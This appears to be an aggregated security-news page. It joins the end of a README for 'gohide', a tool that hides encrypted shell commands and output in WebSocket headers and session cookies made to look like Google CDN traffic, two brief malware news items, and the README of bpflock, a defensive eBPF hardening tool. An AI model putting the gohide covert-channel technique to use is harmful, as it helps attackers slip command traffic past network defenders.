Linux WOPR-KALI 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-1kali1 (2019-11-11) x86_64 GNU/Linux
netstat -pantwu
Active Internet connections (servers and established)
tcp 0 0 127.0.0.1:39684 127.0.0.1:8081 ESTABLISHED 14334/./gohide

Obfuscation Samples

websocket-client (Box A to Box B)

  • Sec-WebSocket-Key contains AES-GCM encrypted content e.g. "uname -a".
GET /news/api/latest HTTP/1.1
Host: cdn-tb0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: 6jZS+0Wg1IP3n33RievbomIuvh5ZdNMPjVowXm62
Sec-WebSocket-Version: 13

websocket-server (Box B to Box A)

  • Sec-WebSocket-Accept contains AES-GCM encrypted output.
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: URrP5l0Z3NIHXi+isjuIyTSKfoP60Vw5d2gqcmI=

http-client

  • Session cookie header contains AES-GCM encrypted content
GET /news/api/latest HTTP/1.1
Host: cdn-tbn0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://www.bbc.co.uk/
Connection: keep-alive
Cookie: Session=R7IJ8y/EBgCanTo6fc0fxhNVDA27PFXYberJNW29; Secure; HttpOnly

http-server

  • Set-Cookie header contains AES-GCM encrypted content.
HTTP/2.0 200 OK
content-encoding: gzip
content-type: text/html; charset=utf-8
pragma: no-cache
server: nginx
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, must-revalidate
expires: Thu, 21 Nov 2019 01:07:15 GMT
date: Thu, 21 Nov 2019 01:07:15 GMT
content-length: 30330
vary: Accept-Encoding
X-Firefox-Spdy: h2
Set-Cookie: Session=gWMnQhh+1vkllaOxueOXx9/rLkpf3cmh5uUCmHhy; Secure; Path=/; HttpOnly

none

8JWxXufVora2FNa/8m2Vnub6oiA2raV4Q5tUELJA


Future

  • Fix up error handling.

Enjoy~



Hackers Hide Malware in Stunning Images Taken by James Webb Space Telescope

A persistent Golang-based malware campaign dubbed GO#WEBBFUSCATOR has leveraged the deep field image taken from NASA's James Webb Space Telescope (JWST) as a lure to deploy malicious payloads on infected systems. The development, revealed by Securonix, points to the growing adoption of Go among threat actors, given the programming language's cross-platform support, effectively allowing the

New Golang-based 'Agenda Ransomware' Can Be Customized For Each Victim

A new ransomware strain written in Golang dubbed "Agenda" has been spotted in the wild, targeting healthcare and education entities in Indonesia, Saudi Arabia, South Africa, and Thailand. "Agenda can reboot systems in safe mode, attempts to stop many server-specific processes and services, and has multiple modes to run," Trend Micro researchersΒ saidΒ in an analysis last week. Qilin, the threat

Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines


bpflock - eBPF driven security for locking and auditing Linux machines.

Note: bpflock is currently in an experimental stage; it may break, options and security semantics may change, and some BPF programs will be updated to use the Cilium eBPF library.


1. Introduction

bpflock uses eBPF to strengthen Linux security. By restricting access to a wide range of Linux features, bpflock is able to reduce the attack surface and block some well-known attack techniques.

Only programs like container managers, systemd and other containers/programs that run in the host pid and network namespaces are allowed access to full Linux features; containers and applications that run in their own namespaces will be restricted. If bpflock's BPF programs run under the restricted profile, then all programs/containers, including privileged ones, will have their access denied.

bpflock protects Linux machines by taking advantage of multiple security features including Linux Security Modules + BPF.

Architecture and Security design notes:

  • bpflock is not a mandatory access control labeling solution, and it does not intend to replace AppArmor, SELinux, and other MAC solutions. bpflock uses a simple declarative security profile.
  • bpflock offers multiple small bpf programs that can be reused in multiple contexts from Cloud Native deployments to Linux IoT devices.
  • bpflock is able to restrict root from accessing certain Linux features, however it does not protect against evil root.

2. Functionality Overview

2.1 Security features

bpflock offers multiple security protections that can be classified as:

2.2 Semantics

bpflock keeps the security semantics simple. It supports three global profiles to broadly cover the security spectrum, and restricts access to specific Linux features.

  • profile: this is the global profile that can be applied per bpf program, it takes one of the followings:

    • allow|none|privileged : they are the same, they define the least secure profile. In this profile access is logged and allowed for all processes. Useful to log security events.
    • baseline : restrictive profile where access is denied for all processes, except privileged applications and containers that run in the host namespaces, or per cgroup allowed profiles in the bpflock_cgroupmap bpf map.
    • restricted : heavily restricted profile where access is denied for all processes.
  • Allowed or blocked operations/commands:

    Under the allow|privileged or baseline profiles, a list of allowed or blocked commands can be specified and will be applied.

    • --protection-allow : comma-separated list of allowed operations. Valid under baseline profile, this is useful for applications that are too specific and perform privileged operations. It will reduce the use of the allow | privileged profile, so instead of using the privileged profile, we can specify the baseline one and add a set of allowed commands to offer a case-by-case definition for such applications.
    • --protection-block : comma-separated list of blocked operations. Valid under allow|privileged and baseline profiles, it allows to restrict access to some features without using the full restricted profile that might break some specific applications. Using baseline or privileged profiles opens the gate to access most Linux features, but with the --protection-block option some of this access can be blocked.

For bpf security examples check bpflock configuration examples

3. Deployment

3.1 Prerequisites

bpflock needs the following:

  • Linux kernel version >= 5.13 with the following configuration:

    Obviously a BTF enabled kernel.

    Enable BPF LSM support

    Check /boot/config-* to confirm whether your kernel was compiled with CONFIG_BPF_LSM=y. If it was not, running bpflock fails with:

    must have a kernel with 'CONFIG_BPF_LSM=y' 'CONFIG_LSM=\"...,bpf\"'"

    Then to enable BPF LSM as an example on Ubuntu:

    1. Open the /etc/default/grub file as privileged of course.
    2. Append the following to the GRUB_CMDLINE_LINUX variable and save.
      "lsm=lockdown,capability,yama,apparmor,bpf"
      or
      GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
    3. Update grub config with:
      sudo update-grub2
    4. Reboot into your kernel.

    3.2 Docker deployment

    To run using the default allow or privileged profile (the least secure profile):

    docker run --name bpflock -it --rm --cgroupns=host \
    --pid=host --privileged \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Fileless Binary Execution

    To log and restrict fileless binary execution run with:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_FILELESSLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    When running under the restricted profile, the container logs will display:

    Running under the restricted profile may break things; this is why the default profile is allow.

    Kernel Modules Protection

    To apply Kernel Modules Protection run with environment variable BPFLOCK_KMODLOCK_PROFILE=baseline or BPFLOCK_KMODLOCK_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KMODLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example:

    $ sudo unshare -p -n -f
    # modprobe xfs
    modprobe: ERROR: could not insert 'xfs': Operation not permitted

    Kernel Image Lock-down

    To apply Kernel Image Lock-down run with environment variable BPFLOCK_KIMGLOCK_PROFILE=baseline:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KIMGLOCK_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock
    $ sudo unshare -f -p -n bash
    # head -c 1 /dev/mem
    head: cannot open '/dev/mem' for reading: Operation not permitted

    BPF Protection

    To apply bpf restriction run with environment variable BPFLOCK_BPFRESTRICT_PROFILE=baseline or BPFLOCK_BPFRESTRICT_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_BPFRESTRICT_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example running in a different pid and network namespaces and using bpftool:

    $ sudo unshare -f -p -n bash
    # bpftool prog
    Error: can't get next program: Operation not permitted
    Running with the -e "BPFLOCK_BPFRESTRICT_PROFILE=restricted" profile will deny bpf for all.

    3.3 Configuration and Environment file

    Passing configuration as bind mounts can be achieved using the following command.

    Assuming the bpflock.yaml and bpf.d profile configs are in a bpflock directory inside the current directory, we can just use:

    ls bpflock/
    bpf.d bpflock.d bpflock.yaml
    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -v $(pwd)/bpflock/:/etc/bpflock \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Passing environment variables can also be done with files using --env-file. All parameters can be passed as environment variables using the BPFLOCK_$VARIABLE_NAME=VALUE format.

    Example run with environment variables in a file:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    --env-file bpflock.env.list \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock
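
    The bpflock.env.list file referenced above could, as a minimal sketch, simply reuse the profile variables demonstrated earlier:

    BPFLOCK_FILELESSLOCK_PROFILE=restricted
    BPFLOCK_KMODLOCK_PROFILE=baseline
    BPFLOCK_BPFRESTRICT_PROFILE=baseline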

    4. Documentation

    Documentation files can be found here.

    5. Build

    bpflock uses Docker BuildKit to build and Golang to run some checks and tests. bpflock is built inside an Ubuntu container that downloads the standard Golang package.

    Run the following to build the bpflock docker container:

    git submodule update --init --recursive
    make

    Bpf programs are built using libbpf. The docker image used is Ubuntu.

    If you want to only build the bpf programs directly without using docker, then on Ubuntu:

    sudo apt install -y pkg-config bison binutils-dev build-essential \
    flex libc6-dev clang-12 libllvm12 llvm-12-dev libclang-12-dev \
    zlib1g-dev libelf-dev libfl-dev gcc-multilib zlib1g-dev \
    libcap-dev libiberty-dev libbfd-dev

    Then run:

    make bpf-programs

    In this case the generated programs will be inside the ./bpf/build/... directory.

    Credits

    bpflock uses a lot of resources, including source code from the Cilium and bcc projects.

    License

    The bpflock user space components are licensed under the Apache License, Version 2.0. The BPF code where it is noted is licensed under the General Public License, Version 2.0.



❌